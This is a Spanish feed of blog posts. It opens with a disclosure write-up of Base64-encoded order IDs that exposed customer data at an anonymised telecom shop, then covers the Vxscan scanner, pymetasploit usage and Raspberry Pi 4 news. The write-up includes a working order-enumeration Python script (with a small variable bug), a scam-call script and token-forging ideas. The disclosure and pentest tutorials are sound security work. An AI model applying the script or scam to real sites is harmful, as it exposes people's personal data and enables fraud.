Base64 es un sistema de numeración posicional que usa 64 como base. Es la mayor potencia de dos que puede ser representada usando únicamente los caracteres imprimibles de ASCII [1].

Todos los sistemas de numeración tienen una lista de símbolos que utilizan para representar valores, por ejemplo [2]:

Binario: 01
Decimal: 0123456789
Hexadecimal: 0123456789ABCDEF
y para Base64 el conjunto es:
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/

La función para codificar en Base64 es biyectiva, lo que significa que existe una función que dado un texto encriptado en Base64, esta obtiene el texto original.
base64encode('blackploit') = 'YmxhY2twbG9pdA=='
base64decode('YmxhY2twbG9pdA==') = 'blackploit'

Base64 no es un método de encriptación. Si bien ofusca la información ante la vista normal, se puede obtener la información original muy fácilmente.

Base64 pesa un 33% más que la información original. Esta relación está dada por la relación 8 a 6 bits por carácter, (o sea, un carácter de base64 representa menos información que un carácter normal).

Base64 es muy útil, y sus tres principales usos son:
  • Transmitir datos en codificaciones conocidas como ASCII o utf-8, sin tener problemas de compatibilidad entre sistemas, lo que permite transmitir binarios también.
  • Permite pasar a través de URLs caracteres raros o comodines como #/^? sin ser procesados por el navegador.
  • Puedes visualizar imágenes en Base64, por lo cual puedes guardar tus imágenes como texto en una base de datos y no como archivos en un sistema de ficheros.

Este emoji está en Base64:
<img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAABt0lEQVQ4jZWTsWtTURTGf+e+mzYpCAZJIBE0piQUS7EgBbN06FDM8ob+CWKMW0fxT3CMiwaDf0GnLt2KdHlTQQeFVmxTRB2C0UESY17uc3g39eWFCPngDvee7zv3u+fcI8TQ36+sA3VgCyjY4zZwCDRTrvc2ypeIcAloAA8AFU9sYYDXwG7K9XqXCaz4ANicIYzjCKimXK83vqkxhxjLbQCIffPxf2zPggHuaqD+7sIo76Phyw/oDQKSC1DICMVMWKKzTkC7E/D7DywtCtfTUCkpdeemqkt3795J9dmw7Jv5rtcKDp4kTlUyQSGXniYogVZN06pplEzHc2lIJigoEWF7zZkiFLPCSl6xklcUs9MZttccRAQNtHc2VLn7K8AfwWIiXFu3/9X0qetw+MEwGMJgCNqBnQ0F0Jb+fuUF8HhM/tTR3Lrmo2I9MQbOv2uWM370+KUGmsAjbBv9ETx/c4XV3JAbaR8EPncd3n9b4P5qfyIn0Bz/xFfAw8tIEDr5+jOsTf7qiOWMHy9mK+V6NW03u0AZ+xuVQCnrU8pO2I3iyGpC23YwqkDLWpsFYznViWGKYt5x/gvnj4PS5kTD9gAAAABJRU5ErkJggg==">

Esta larga introducción es para mostrarles que Base64 NO es un método de encriptación. Comprando un producto a través de una página de telefonía, me encontré con que usaban como método de "seguridad" pasar el id de una orden de compra encriptada codificada a Base64, lo cual permitió una fuga generalizada de las órdenes de compra de esa empresa.

Aquí los dejo con el análisis de las vulnerabilidades:

Vulnerabilidades

Vulnerabilidad 1 - Obtención de todas las órdenes de compra

Una vez que se compra un producto en "empresa telefonía", se envía la orden de compra con un enlace con el siguiente formato:
https://empresatelefonia.cl/fullprice/certificadopdforden?id=NDAwMDAxOTgyNQ==

Como podemos notar el parámetro id recibe algo en Base64, si lo decodificamos nos damos cuenta que es exactamente el id de la compra:
NDAwMDAxOTgyNQ== → 4000019825

También podemos notar que la orden de compra es un número ascendente, que probablemente parte del 4000000000.

Para obtener todas la órdenes se crea un simple script en python que recorre las órdenes del 4000000000 al 4000200000 (empíricamente podemos notar que llegan hasta solo 4000019831 al momento de escribir este reporte), la orden se codifica a Base64 y se concatena con la URL que genera la orden de compra:

import threading
import time
import requests
import base64
import sys
import os

START_IN = 4000000000
STOP_IN = 4000020000
THREADS = 5
SAVE_PATH = './orders'

class ThreadFunction(threading.Thread):
    def run(self):
        global START_IN
        while True:
            START_IN +=1
            if START_IN > STOP_IN:
                break
            order_number = str(START_IN)
            b64_order_number = base64.b64encode(order_number.encode('ascii')).decode("utf-8")
            url_order = 'https://empresatelefonia.cl/fullprice/certificadopdforden?id={}'.format(b64_order_number)
            r = requests.get(url_order)
            print('[{}] \t {} -> order: {}'.format(r.status_code, url_order, START_IN))
            if r.status_code == 200:
                with open('{}/{}.pdf'.format(SAVE_PATH, order_number), 'wb') as f:
                    f.write(r.content)
            else:
                continue

def main():
    if not os.path.exists(SAVE_PATH):
        os.makedirs(SAVE_PATH)
    if len(sys.argv) >= 2:
        global THREADS
        THREADS = int(sys.argv[1])
    if len(sys.argv) >= 3:
        global START_IN
        START_IN = int(sys.argv[2])
    if len(sys.argv) >= 4:
        global STOP_IN
        STOP_IN = int(sys.argv[3])
    for x in range(threads):
        mythread = ThreadFunction(name = "Thread-{}".format(x + 1))
        mythread.start()

if __name__ == '__main__':
    main()

Modo de uso:
python3 ordenes.py <n° de threads> <n° primera orden> <n° última orden>

Con este script se puede obtener 19783 órdenes de compra (510 MBs):


Los datos obtenidos son privados y en su conjunto, sensibles:


Datos:
  • Nombre
  • Apellido
  • RUT
  • Mail
  • Teléfono
  • Dirección
  • Producto y precio de compra

Vulnerabilidad 2 - Sensitive Data Exposure

Si se induce un error en la URL anterior, obtenemos un error demasiado verboso:
https://empresatelefonia.cl/fullprice/certificadopdforden?id=jw==
 

Datos obtenidos:
  • Ruta completa de la aplicación
  • Framework de programación

Vulnerabilidad 3 - Confirmación de correo

En la misma línea se encontró que el enlace para confirmar el correo, también pasa los datos codificados en base64, por ende fácilmente decodificable:

https://empresatelefonia.cl/ValidacionMailAPP/Valida?token=cnV0PTE4OTk5OTk5LTAmbWFpbD1waWNob25AZ21haWwuY29tJmVudGlkYWQ9NTY5NSZlbnRpZGFkaWQ9MTA2MTIyOTQw

cnV0PTE4OTk5OTk5LTAmbWFpbD1waWNob25AZ21haWwuY29tJmVudGlkYWQ9NTY5NSZlbnRpZGFkaWQ9MTA2MTIyOTQw → rut=18999999-0&mail=pichon@gmail.com&entidad=5695&entidadid=106122940

Más allá de que es una mala práctica pasar datos personales por método GET, se puede crear un script que genere automáticamente el "token" de verificación de correo, bajo el supuesto de que el RUT y correo ya lo tenemos gracias a la vulnerabilidad anterior.

Vulnerabilidad 4 - Demasiada información sin seguridad

Con el siguiente enlace se puede obtener el seguimiento de una orden, lo que incluye el producto comprado.
https://empresatelefonia.cl/seguimiento-despacho/resultados/index/orden/4000019747


Esto quizás no parece una vulnerabilidad, pero se puede crear un script que vaya obteniendo los productos que vende la empresa en tiempo real, información muy útil para la competencia.

Vectores de ataque

Vector de ataque 1 - Interceptación física

Con la vulnerabilidad 1 y 4 se puede saber quién compra, dónde y cuándo va llegar el producto, por tanto un delincuente puede esperar a que llegue un repartidor para asaltarlo, ya que se sabe exactamente con que producto anda.

Vector de ataque 2 - Estafa telefónica

Delincuente: Aló
Víctima: Hola
Delincuente: Estimado Rodrigo Perez, lo llamamos de Empresa Telefonía ya que se compró un teléfono iPhone X el día de ayer. ¿Cierto?
Víctima: Si
Delincuente: Queremos decirle que el celular que le costó $1.039.000 estaba en oferta y se le cobró de más, el precio real era de $690.000. ¿Sería tan amable de darnos su tarjeta de crédito para abonarle la diferencia?
Víctima: Claro

Vector de ataque 3 - Cualquier tipo de ataque de ingeniería social

Dado que se tienen muchos datos personales, en manos de delincuentes estos datos serían propicios para cometer una infinidad de delitos de ingeniería social.

Mitigación

Siempre que se deba pasar datos sensibles a través de un enlace, este debe ser un token del id original.
Se define como token un string alfanumérico único lo suficientemente largo para que no sea adivinable y que no exista una función matemática lineal que dado un token se obtenga el id original.
Existen muchas funciones generadoras de hash como sha256, sha2, sha3, etc... Para que sea un token seguro se recomienda usar valores aleatorios y una combinación de funciones de hash.
Por tanto lo que se debe hacer es crear por cada orden un token y que los enlaces en la vulnerabilidad 1 y 4 reciban como parámetro ese token.

Ejemplo:
https://empresatelefonia.cl/fullprice/certificadopdforden?id=abfae0f14c8a4c6d08bb618bf1955086
https://empresatelefonia.cl/seguimiento-despacho/resultados/index/orden/abfae0f14c8a4c6d08bb618bf1955086

id_orden token_orden id_cliente ...
4000019747 abfae0f14c8a4c6d08bb618bf1955086 231 ...
4000019748 0fe44a966488ed7987d0c760d0699365 532 ...
... ... ... ...

Exactamente lo mismo se debe hacer en la vulnerabilidad 3, donde se debe generar un token único por usuario y pesarlo como parámetro el token del usuario y no los datos.
Base64 no sirve para cifrar datos ya que solo lo codifica, es decir, existe una función que puede revertir la codificación y obtener los datos originales.

Conclusión

  1. Base64 NO es un método de encriptación.
  2. La empresa involucrada se comportó muy profesionalmente, me llamaron en menos de 48 horas del reporte, y repararon absolutamente todas las vulnerabilidades en menos de una semana, y eso que eran complicadas de resolver ya que tenían que cambiar el modelo de la base de datos. Además contaban con un área de Cyber Seguridad y no como un banco que hablé en el pasado que trató el problema como un ticket de servicio al cliente. Felicitaciones!
  3. Los datos obtenidos fueron con fines demostrativos y todas las órdenes obtenidas en el POC fueron eliminadas.


Bibliografía

  1. https://es.wikipedia.org/wiki/Base64
  2. https://varionet.wordpress.com/2009/11/06/sobre-base64-para-que-usarlo-para-que-no-y-como-manejarlo-en-net-y-asp-net/

Saludos ;)



03 Jul 06:42

Vxscan: Herramienta de auditoría de servidores de Internet escrita en Python

by noreply@blogger.com (Chema Alonso)
Como bien sabemos la red está llena de herramientas que hacen más fácil el día a día de un pentester para los proyectos de Ethical Hacking. Cada uno tiene sus preferencias y gustos, para ello hay que ir probando, así que en esta ocasión quiero hablaros de una nueva herramienta escrita en Python, cuyo nombre es Vxscan y que se trata de un escáner.

Figura 1: Vxscan: Herramienta de auditoría de servidores de Internet escrita en Python

La herramienta no proporciona interfaz gráfica, ni la necesita, nos basta con utilizar la línea de comandos para hacerla correr. El tiempo que tarda en hacer un escaneo es bastante pequeño, y busca cosas que son bastantes útiles en el hacking de aplicaciones web.

Figura 2: Libro de Hacking de Aplicaciones Web: SQL Injection
de Chema Alonso y Enrique Rando en 0xWord

Si a lo largo del artículos te surgen ideas o mejoras para Vxscan, te ánimo a colaborar y hacer llegar esas sugerencias a su creador. El primer paso es conocer alguna de las tareas que va a llevar a cabo esta herramienta:
  • Detección de archivos confidenciales
  • Identificación de WAF/CDN
  • Escaneo de puertos
  • Fingerprinting de servicios y sistemas operativos
  • Detección de contraseñas débiles
  • Búsqueda de vulnerabilidades de SQL Injection.
  • ...

Conseguir Vxscan

Es muy sencillo tener Vxscan, basta con visitar GitHub y descargarnos la herramienta, para ello basta con hacer un clone. Acto seguido instalamos las librerías de Python que se necesitan como se puede ver en la imagen siguiente.

Figura 3: Descargando Vxscan e instalando dependencias

Por último, para tener listo Vxscan, nos indica que necesitamos descargar dos ficheros. Los enlaces son los siguientes:
Tenemos que descomprimir los archivos y pasar los archivos .mmdb a la carpeta db que trae Vxscan. Y ya podemos pasar a trastear con el escáner, como siempre, para saber su uso, buscar la ayuda como se puede ver en la imagen siguiente.

Figura 4: Ayuda de Vxscan

Podemos ver los parámetros que admite la herramienta y sus descripciones. Ninguna rara, todo es claro y sencillo. También puedes agregar contraseñas por defecto, una cookie o claves de API (tipo Shodan o Virus Total) en el archivo settings.py.

Figura 5: Vxscan settings

Cómo realizar un escáner con Vxscan

El escáner se puede llevar a cabo de distintas formas:
1. Escanear un sitio web: python3 Vxscan.py -u [url] 
2. Escanear sitios webs a partir de un fichero: python3 Vxscan.py -f [file] 
3. Enrutamiento entre dominios sin clases (CIDR siglas en inglés): Python3 Vxscan.py -i 127.0.0.0/24 
4. Hacer uso de un diccionario: python3 Vxscan.py -u [url] -w [dictionary]
Vamos a ver algunos ejemplos, para el caso primero escaneando una web vulnerable, alojada en un sistema con muchos puertos abiertos (Metasploitable 2).

Figura 6: Escáner de una web con Vxscan

Aunque le he agregado la opción –-cookie no la pilla, si miramos el código, parece que este argumento no lo utiliza para nada, supongo que está ahí para futuras versiones. El ejemplo que nos muestran ellos, sacan más información, en la imagen siguiente se puede apreciar su ejecución, pero a día de hoy en settings tienen capada la entrada de diccionarios con la variable SKIP a True. Si queremos que busquen URLs, necesitamos poner esa variable a False.

Figura 7: Escáner de una web con Vxscan

Vemos que la dirección está en Chino. Bueno, se puede pasar por alto, se puede usar el traductor y vemos que se trata de Alemania. Puedes comprobar cómo el sistema operativo no lo ha reconocido, esto se debe a que por detrás está usando nmap, y lo he lanzado sin privilegios. En la carpeta report, se pueden ver los reportes, en formato HTML (ver figura siguiente) o en JSON.

Figura 8: Reporte en html de Vxscan

La opción -i arroja una excepción no controlada que habría que revisar. Por último, dejo un vídeo con una demostración de lanzar un escáner a dos páginas a través de un fichero (cada web va en una línea).


Figura 9: Pentesting dos webs con VxScan
La PoC del vídeo cuenta con algunas modificaciones en el código. Pues esto es todo, esperando más actualizaciones de la herramienta para ver las mejoras, siempre es un placer probar los nuevos aportes a la comunidad.

¡Hasta pronto!

Autor: Josué Encinar García (@JosueEncinar), autor del blog BoomerNiX y Security Researcher en ElevenPaths y en el equipo de Ideas Locas de la unidad CDO de Telefónica
26 Jun 06:38

Python & Metasploit: Librería pymetasploit para integrar scripts

by noreply@blogger.com (Chema Alonso)
En este blog ya se habló de la automatización de Metasploit a través del uso de msfrpc y el daemon msfrpcd. En aquel caso trabajamos sobre Ruby y sobre la propia herramienta o cliente msfrpc. Hoy quiero contar como hacer esto con el lenguaje más utilizado, muy a mi pesar, ya que yo soy más de Ruby, de la ciberseguridad: Python. El uso de RPC es algo bastante potente, ya que permite integrar diferentes lenguajes para poder utilizar de forma remota un entorno de Metasploit.

Figura 1: Python & Metasploit: Librería pymetasploit para integrar scripts

Es cierto que en la versión 5 de Metasploit hay novedades respecto a la integración de otros lenguajes, pero no está de más conocer las posibilidades que ofrecen las librerías.

¿Cómo te ha dado por probar esto?

Pues la respuesta a esto es sencilla. Yo he utilizado Python siempre que lo he necesitado, es el lenguaje más utilizado en ciberseguridad y, aunque no es mi favorito, lo utilizo. Además, mi compañero Fran Ramírez y yo estamos preparando un workshop que se celebrará la noche del 6 al 7 de julio en París, en la ciudad de las ciencias, dentro del antiguo congreso “Nuit du hack” o como se llamada ahora “LeHack”.

Figura 2: Libros de "Metasploit para pentesters 4ª Edición"
y "Hacking con Metasploit: Advanced Pentesting" de 0xWord.

Lo curioso del workshop es de qué tratará. “Learning how to code doing some hacking and creating AI programs to beat video games”.

Figura 3: Workshops en LeHack

En otras palabras, un workshop dónde se habla de hacking y se utiliza éste para aprender a programar en Python y se hace uso de Open AI para aprender a programar pequeños juegos, apoyándose en Python y en el framework de IA. Curiosa mezcla con el objetivo de aprender a programar con diferentes ámbitos.

Jugando con PyMetasploit

Han salido diferentes versiones de esta librería, la cual aporta una fácil integración de scripting en Python con Metasploit. Gracias a esta librería será realmente sencillo poder interactuar con Metasploit con tus scripts de Python. La instalación se puede hacer de manera sencilla a través de pip. Como nota, si descargas la versión para Python 2.x puedes encontrar un problema con la versión oficial.

Figura 4: Libro de "Python para Pentesters" y "Hacking con Python" de 0xWord

En el Github de la librería se puede encontrar la solución. Si ves que al intentar usar los módulos de Metasploit desde la librería, sale un error similar a “can’t set attributte…” significa que hay una serie de elementos que faltan. Esto se solucionó en el commit siguiente.

Figura 5: Commit para solucionar el bug

Lo primero es montar el daemon de msfrpcd con el que se puede manejar remotamente los objetos de Metasploit. Esta aplicación tiene bastantes opciones para interactuar, desde disponer de SSL para cifrar el canal, utilizar formato JSON, dónde ‘atar’ el servicio, es decir, a qué dirección IP, usuario y contraseña para acceder a Metasploit remotamente, etcétera.

La ejecución y puesta en funcionamiento de msfrpcd puede ser, como se ha comentado, muy variada. Para este ejemplo se ha decidido por un usuario llamado ‘msf’ y una contraseña ‘123abc.’. Además, se indica con el parámetro –f que la aplicación ejecutará en foreground y no en background, como se haría por defecto. Con el parámetro –S, a pesar de parecer lo contrario, lo que se indica es que no se habilite el SSL en las conexiones con el daemon.

Figura 6: Ejecución de msfrpcd

Una vez hecho esto, vamos a probar a abrirnos un intérprete de Python y empezar a jugar. Lo primero es cargar la librería msfrpc e importarla, tal y como se puede ver en la imagen. Una vez hecho esto, vamos a crear un objeto llamado client que representará la conexión con nuestro Metasploit remoto.

En este ejemplo, nuestro Metasploit se encuentra en la dirección IP 10.0.0.31, mientras que la máquina que utilizamos se encuentra en la dirección IP 10.0.0.1. Como se puede ver, se incluyen una serie de parámetros para realizar la conexión con éxito como son:
  • Username: Usuario que se configuró en el lanzamiento de msfrpcd.
  • Password: La contraseña que se configuró en la ejecución de msfrpcd.
  • SSL: El parámetro ssl se configura a False, ya que así se configuró en la ejecución del daemon msfrpcd.
  • Server: Dirección IP dónde se encuentra el daemon de Metasploit al que se quiere conectar remotamente.
El objeto client representa la conexión y el acceso a Metasploit. Con él ya podemos acceder a todos los elementos del framework como exploits, payloads, encoders, módulos auxiliary, etcétera.

Figura 7: Objeto Client en la ejecución de Python en nuestra Kali Linux

Si queremos listar los módulos disponibles en Metasploit podemos ejecutar client.modules.list. Lo interesante en Python es que se puede hacer uso de dir() para ver los métodos disponibles. Si no lo tenemos muy claro, podemos ejecutar dir(client.modules).

Si queremos utilizar un módulo, lo que sería equivalente a ejecutar un use [module] en la consola de Metasploit, debemos ejecutar client.modules.use([tipo módulo],[ruta del módulo]). Es importante utilizar una variable donde se asignará la creación del objeto module, tal y como se puede ver en la imagen, e = client.modules.use(‘exploit’,’windows/ftp/kmftp_utility_cwd’).

Figura 8: Creación del objeto e para tener un objeto module

Con la variable e creada se puede acceder a todas las opciones que tiene un módulo. Es más, se pueden utilizar ‘atajos’ como e.required para ver qué atributos son obligatorios. Si queremos configurar un atributo se ejecutará e[‘nombreAtributo’], tal y como se puede ver en la imagen superior.

Una vez que se tiene el objeto creado y preparado para ser lanzado, es decir, configurado se puede utilizar el método execute para ejecutar el módulo. Es recomendable configurar el payload y las opciones de éste en caso de ser necesario.

Para este ejemplo se utiliza e.execute(payload=[ruta payload]). Se utiliza una Shell_bind_tcp de manera sencilla. Como se puede ver en la imagen se obtiene un resultado donde se dice que el job es identificado con el número 5.

Figura 9: Ejecución del comando sessions

Lo importante es fijarse en el identificador de la sesión, como ocurre en la consola de Metasploit cuando se ejecuta el comando sessions. Para ver el listado de sesiones desde el intérprete podemos ejecutar el método client.sessions.list. Quizá sea interesante lanzar previamente dir(client.sessions) para ver los métodos disponibles.

¿Cómo interactúo con la sesión? 

Aquí llega una parte sencilla. Una vez identificamos el número de la sesión, se puede hacer uso de client.sessions.session([ID de sesión]) para conseguir un canal por el que enviar comandos y recibir respuestas de ejecución. Para ello, creamos un nuevo objeto y lo almacenamos en una variable, por ejemplo, Shell. Este objeto tiene diferentes métodos, entre los que destacan: Shell.write() y Shell.read().

Figura 10: Comandos shell

Como se puede ver es una forma sencilla de integrar un lenguaje como Python en el uso de Metasploit y sus posibilidades. Se te pueden ocurrir una gran cantidad de scripts en Python. Hay que recordar que Armitage, la GUI de Metasploit, utiliza msfrpc para conectar con el framework. Si eres de Python y quieres jugar con Metasploit utiliza pymetasploit o échale un ojo a la versión 5 de Metasploit y a sus novedades referente a esto.
 
Autor: Pablo González Pérez (@pablogonzalezpe), escritor de los libros "Metasploit para Pentesters", "Hacking con Metasploit: Advanced Pentesting" "Hacking Windows", "Ethical Hacking", "Got Root" y “Pentesting con Powershell”, Microsoft MVP en Seguridad y Security Researcher en el equipo de "Ideas Locas" de la unidad CDO de Telefónica.
25 Jun 07:43

VMware: ESXi reglas firewall con fichero

by noreply@blogger.com (Unknown)
24 Jun 07:43

Raspberry Pi 4 es oficial: una completa actualización con procesador Cortex-A72, hasta 4 GB de RAM y desde 35 dólares

by Cristian Rus

Raspberry Pi 4 es oficial: una completa actualización con procesador Cortex-A72, hasta 4 GB de RAM y desde 35 dólares

Raspberry Pi es uno de los ordenadores más básicos que podemos encontrar, también uno de los más vendidos de toda la historia informática. Su atractivo precio ha hecho que se vendan millones y millones de unidades generación tras generación. Hoy se ha anunciado, por sorpresa, Raspberry Pi 4. Esta nueva versión con una CPU ARM Cortex-A72 permite, entre otras cosas, la decodificación de vídeo 4K a 60 fps (sin compatibilidad con HDR). Su precio de salida se mantiene fiel al estilo de la marca: 35 dólares para la versión mas básica de todas.

Se esperaba que llegase este nuevo modelo para 2020, sin embargo, la compañía ha conseguido sacar adelante la producción del dispositivo con unos 9-12 meses de antelación, según han explicado. De momento ponen a la venta la Raspberry Pi 4 Model B, el modelo A que tradicionalmente se centra en ofrecer un producto más básico y aún mas barato en esta ocasión aún no lo van a lanzar. Comentan que no han visto cambios significativos por los que ofrecer un dispositivo diferente a menos de 35 dólares, que es lo que cuesta la versión básica de Raspberry Pi 4 Model B.

Raspberry Pi 4 una actualización interna al completo

Raspberry Pi 4 es una actualización mayor de lo que podemos ver a primera vista, el cambio de procesador a un ARM Cortex-172 con cuatro núcleos a 1,5 GHz también implicaba pasar de los 40 nm a los 28 nm. En consecuencia, todos los componentes y la potencia del dispositivo ha cambiado. Explican en el anuncio oficial que los benchmark dan resultados entre dos y cuatro veces mayores respecto a la Raspberry Pi 3B+.

Hero Alt Squashed

Veamos sus especificaciones técnicas:

Raspberry Pi 4

Procesador

ARM Cortex-A72

Frecuencia de reloj

1,5 GHz

GPU

VideoCore VI (con soporte para OpenGL ES 3.x)

Memoria

1 GB / 2 GB / 4 GB LPDDR4 SDRAM

Conectividad

Bluetooth 5.0, Wi-Fi 802.11ac, Gigabit Ethernet

Puertos

GPIO 40 pines 2 x micro HDMI 2 x USB 2.0 2 x USB 3.0 CSI (cámara Raspberry Pi) DSI (pantalla tácil) Micro SD Conector de audio jack USB-C (alimentación)

Precio

Desde 35 dólares

Además de mejorar su potencia, un cambio interesante y a tener en cuenta en esta nueva Raspberry Pi 4 es la puesta al día de sus conexiones. Raspberry Pi 4 viene con Bluetooth 5.0 y Wi-Fi 802.11ac para las conexiones inalámbricas. También se ha cambiado el conector microUSB de alimentación por un USB-C que suma 500 mA extra de energía para alcanzar un total de 1.2 A.

Power Cu Squashed

Algunos detalles extra a tener en cuenta son por ejemplo el soporte para doble monitor con resolución 4K. La opción para reproducir vídeo 4K a 60 fps en HEVC o los gráficos VideoCore VI, compatibles con OpenGL ES 3.x Por último, hay que tener en cuenta que Raspberry Pi 4 es compatible con todos los productos de Raspberry Pi anteriores.

Accesorios para Raspberry Pi 4

Como siempre, podremos adquirir diferentes accesorios para vitaminar la Raspberry Pi. Dado que Raspberry Pi 4 cambia ligeramente el diseño se han tenido que fabricar accesorios nuevos para ella. Por ejemplo la nueva caja por 5 dólares. Eso sí, advierten que es posible utilizar la de la generación anterior si se corta ligeramente para poder acceder a los conectores.

Dif Caja de la Rapbserry Pi 4 vs. caja antigua y recortada para una Rapsberry Pi 4.

Además de la nueva caja contamos con un nuevo cargador USB-C con enchufe europeo, británico, americano o australiano. ¿Dispones de un enchufe de una Rapsberry Pi anterior? La marca ha puesto a la venta un adaptador de USB micro-B a USB-C por sólo un dolar. También un cable HDMI capaz de llevar un vídeo 4K a 60 fps por 5 dólares.

Para aquellos que les guste trastear, Rapsberry ha actualizado su guía para principiantes al nuevo modelo. Se trata de una guía completa con instrucciones para sacarle partido al miniPC. Y para quien quiera el kit completo hay una versión de la Rapsberry Pi 4 por 120 dólares que incluye el ordenador, la carcasa, teclado, ratón, la guía para principiantes y una microSD de 32 GB.

Kit2

Precio y disponibilidad de Raspberry Pi 4

Raspberry Pi 4 está disponible para su compra desde distribuidores autorizados de la marca desde hoy mismo. Se han puesto a la venta un total de tres modelos diferentes, que varían según la capacidad de la memoria RAM que traen. Son los siguientes modelos:

  • Raspberry Pi 4 con 1 GB de RAM: 35 dólares.
  • Raspberry Pi 4 con 2 GB de RAM: 45 dólares.
  • Raspberry Pi 4 con 4 GB de RAM: 55 dólares.
Img 1

Recordemos que la Raspberry Pi 4 que se ha puesto a la venta es el modelo B. Como hemos indicado, la marca no ve cambios significativos como para producir una Raspberry Pi 4 Model A a un menor precio de los 35 dólares de momento. También se está evaluando opciones para crear una Raspberry Pi 4 Model C en el futuro.

Más información | Raspberry Pi

También te recomendamos

Raspad, análisis: un tablet con una Raspberry Pi de "quita y pon" que puedes llevar a cualquier lado

De cero a maker: todo lo necesario para empezar con Raspberry Pi

Raspberry Pi 3 Model B+, análisis: más potencia y mejor WiFi para un miniPC que sigue asombrando

-
La noticia Raspberry Pi 4 es oficial: una completa actualización con procesador Cortex-A72, hasta 4 GB de RAM y desde 35 dólares fue publicada originalmente en Xataka por Cristian Rus .

24 Jun 07:41

The Raspberry Pi 4 brings faster CPU, up to 4GB of RAM

by Ron Amadeo

Today, Raspberry Pi is introducing a new version of its popular line of single-board computer. The Raspberry Pi 4 Model B is the fastest Raspberry Pi ever, with the company promising "desktop performance comparable to entry-level x86 PC systems."

The new model is built around a Broadcom BCM2711 SoC, which, with four 1.5GHz Cortex A72 CPU cores, should be a big upgrade over the quad-core Cortex A53 CPU in the Raspberry Pi 3. The RAM options are the even bigger upgrade, though, with options for 1GB, 2GB, and even 4GB of DDR4. The Pi 3 was limited to 1GB of RAM, which really stung for desktop-class use cases.

There have been some upgrades and tweaks to the Pi 4 I/O, too. The Gigabit Ethernet returns, as do the four USB ports, but two of them get an upgrade to USB 3.0. Power is now supplied via a USB-C port, instead of the aging Micro USB of the Pi 3. The headphone jack returns, too, and it's still a four-pole solution providing audio and composite video.

Read 3 remaining paragraphs | Comments

20 Jun 18:16

Raspberry Pi 4, todo lo que sabemos hasta ahora (y todo lo que esperamos)

by Javier Pastor

Raspberry Pi 4, todo lo que sabemos hasta ahora (y todo lo que esperamos)

Uno de los ordenadores más vendidos de toda la historia no es un ordenador convencional. Se trata de la Raspberry Pi, un miniPC que en sus distintas versiones ha logrado vender alrededor de 20 millones de unidades.

Los amantes de este singular dispositivo llevan tiempo esperando por un salto singular y menos evolutivo en su configuración hardware, y aunque no hay apenas detalles de lo que será la Raspberry pi 4, parece claro que se tratará de un modelo muy especial. Esto es lo que sabemos y lo que esperamos de un producto que ha cambiado (un poquito) el mundo y para el que, eso sí, podríamos tener que esperar aún.

Más de un año esperando (y lo que nos queda)

El propio Eben Upton, creador de las Raspberry Pi, nos confesaba a principios de 2018 que aún quedaba más de un año para que pudiéramos ver la Raspberry Pi 4, pero poco después, en abril de 2018, lanzaba la Raspberry Pi 3 Model B+, una versión ligeramente mejorada de su antecesora.

Rpi3

Las mejoras a ese modelo eran ciertamente llamativas tanto en conectividad (WiFi de doble banda, soporte PoE) como en potencia, con una versión algo forzada de su procesador, pero salvo por esos cambios apenas hubo novedades a pesar de que la competencia lleva ya tiempo tratando de aventajar a la RPi allí donde sus propios usuarios demandan más: en sus prestaciones, algo anquilosadas ya.

La cosa no cambió cuando en enero de 2019 la Fundación Raspberry Pi presentó el llamado Raspberry Pi Compute Module 3+ (CM3+), una versión adicional de la Raspberry Pi 3 que adoptaba ese formato "industrial" pero que era especialmente importante por el comentario que acompañaba a su lanzamiento.

En las notas de lanzamiento los creadores de estos dispositivos aseguraban que este sería "el último de una familia de productos basados en litografía de 40 nm", lo que dejaba claro que los cambios que esperaban a la Raspberry Pi 4 empezarían por procesadores bastante más eficientes.

Qué sabemos de las Raspberry Pi 4

Lo cierto es que los responsables de la Fundación Raspberry Pi no han dado demasiadas noticias en el ámbito hardware desde entonces, y apenas sí han ofrecido detalles sobre sus próximos proyectos.

Rpi3

No obstante, sí han confirmado que están trabajando en la próxima versión de la Raspberry Pi. Eben Upton habló con Tom's Hardware y confirmó además que se llamará Raspberry Pi 4. "Sería una locura no llamarla así", explicaba.

Además reveló a esta publicación que aún tendremos que esperar algún tiempo a la aparición de este modelo: "no tengo planes para hacer algún anuncio este año. Creo que entendemos más o menos qué conjunto de características queremos y qué supondría llegar a ese conjunto de características. No creo que tengamos aún un plan definido para convertir eso en un producto por ahora". En cuanto a los cambios confirmados, aunque en muchos casos sin demasiados detalles, esto es lo que sabemos:

  • Adiós a los 40 nm: habrá cambio de litografía, como ya indicó en el anuncio del Raspberry Pi Compute Module 3+. En la entrevista con Tom's Hardware explicaba que "básicamente hemos alcanzado el máximo de rendimiento para ese nodo de proceso [litográfico". Aunque no se han decidido por el tipo de procesador que lo gobernará, parece que el próximo paso es algún SoC de 28 nm, muy lejos aún de los 7 nm que se manejan en procesadores ARM para móviles. El problema, asegura, es que "en geometrías de proceso más pequeñas se hace más difícil (o al menos más costoso) fabricar entradas que puedan sobrevivir a voltajes de 3,3 V aplicadas a ellas, o salidas que puedan llegar a 3,3V". Puede no obstante que la escala litográfica sea algo más avanzada que los 28 nm, pero una cosa es segura: la mejora en eficiencia y potencia que eso permitirá será sensible. Algunos hablan de los Cortex-A55 como candidatos claros, algo que permitiría mejorar el rendimiento en un 20% de media respecto a las actuales RPi. Nada se sabe del potencial soporte de juegos de instrucciones de 64 bits, por ejemplo
  • Precio: este es otro de los elementos clave de la Raspberry Pi 4: durante años estos dispositivos se han hecho famosos por ese precio de 35 dólares que protagonizaban en tiendas, aunque en realidad el precio final pudiera ser ligeramente superior en según qué regiones. Además, para ponerlas en marcha es necesario contar con algunos periféricos como una tarjeta Micro SD o el adaptador de corriente, por ejemplo, y todos ellos van añadiendo pequeños costes al producto final.
  • Formato físico: no veremos probablemente cambios significativos en el diseño físico de estos miniPCs que se venden como pequeñas placas "en crudo" que precisamente por eso tienen un encanto especial. Eso sí: ni aumentarán, ni disminuirán significativamente de tamaño, y por ejemplo Upton explicaba que "no me imagino yendo a formatos más pequeños que el de la Raspberry Pi Zero".
  • USB-C (quizás): el conector utilizado hasta ahora para alimentar las Raspberry Pi ha sido el Micro USB, pero parece que están considerando seriamente el USB-C aunque nada es seguro. Con él es posible llegar a los 3 A de potencia, algo importante para alimentar más periféricos aunque eso podría generar más disipación de calor. Aún así Upton no lo tiene claro por no ser un conector especialmente protegido y que además es proclive a que la suciedad y el polvo se introduzcan en él.
